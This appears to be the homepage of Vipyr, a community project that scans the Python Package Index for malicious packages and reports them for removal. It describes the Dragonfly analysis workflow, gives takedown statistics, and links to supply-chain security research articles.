Novel ELF64 Remote Access Tool Embedded in Malicious PyPI Uploads
Analyzing a Linux-targeted malware campaign on the Python Package Index.
Open source supply chain defense
Removing malware from package ecosystems.
Vipyr runs public systems for package intake, distributed scanning, malicious package reporting, and supply chain research so suspicious releases can move from feed activity to actionable review.
4.1M
Packages scanned
2044
Malicious packages removed
150+
Detection signatures
16
Contributors
Live operating view
Active
Detection to takedown
Coverage
24/7
Continuous package scanning and incident review for emerging supply chain abuse.
Response
10 Minutes
Confirmed packages Vipyr reports are usually actioned in about 10 minutes, not days or months.
Operating sequence
Observe, triage, remediate, publish
PyPI RSS loader Queued
Mainframe job dispatch Assigned
Client scan results Returned
Reporter + analyst review Actioned
standby
Why Vipyr exists
Modern package security needs both automation and human judgment.
Package ecosystems move fast, but useful security work still depends on understandable workflows. Vipyr couples automated intake and scanning systems with review, reporting, and public research.
Observe package ecosystems
Vipyr uses automated intake around package activity so new releases can be loaded into the Dragonfly workflow and reviewed before they disappear into the stream.
Investigate malicious artifacts
Dragonfly clients request work from the API, download distributions, scan package files, and return results in a form that can be reviewed and acted on.
Coordinate remediation
Queue, reporting, and recent-activity flows exist across Dragonfly services so detections can move toward package reports and writeups.
Public defense
Package malware doesn't just hit security teams.
Students, teachers, developers, maintainers, and businesses all depend on package managers they do not have time to treat like a daily threat surface. One typo can be enough. Vipyr operates to catch that abuse without asking those users to install an agent, buy a product, or change how they work.
Built to intervene before the victim knows there is a problem
Vipyr monitors package activity, scans suspicious releases, coordinates reports with ecosystem administrators, and publishes what is learned. The protection is free, and the only meaningful user involvement is the community work that helps improve the tooling and research.
Students and teachers
A single typo during coursework, classroom setup, or lab work can turn a routine install into credential theft or device compromise.
Developers and operators
Typos such as `pip install requestss` or a misplaced `uv` command can pull in a malicious package before anyone notices the mistake.
Businesses and communities
One package can expose local secrets, cloud credentials, or customer data. Vipyr exists to reduce that blast radius before it spreads.
Dragonfly
A distributed malware analysis workflow built for package ecosystem response.
Dragonfly is the operating system behind Vipyr’s package analysis workflows. It spans automated intake, job distribution, compute-node scanning, reporting services, and analyst review.
Research
Analysis from live package ecosystem abuse.
Research is where Vipyr turns detections, reverse engineering, and ecosystem anomalies into work other defenders can inspect and reuse.
Application Security
The Dependency Dilemma
Examining the cascading effect of software supply chain compromises and their mitigation strategies.
Aug 3, 20237 min read
Documentation
Dragonfly Client Internals
Discussing the internals of our client compute node in the Dragonfly framework.
Jul 22, 20236 min read
Explore the research, inspect the tooling, and stay close to the signal.
Follow the workflow from technical writeups to the systems behind them. The same public repos that support intake, scanning, queue handling, reporting, and focused triage also make Vipyr Security easier to understand from the outside.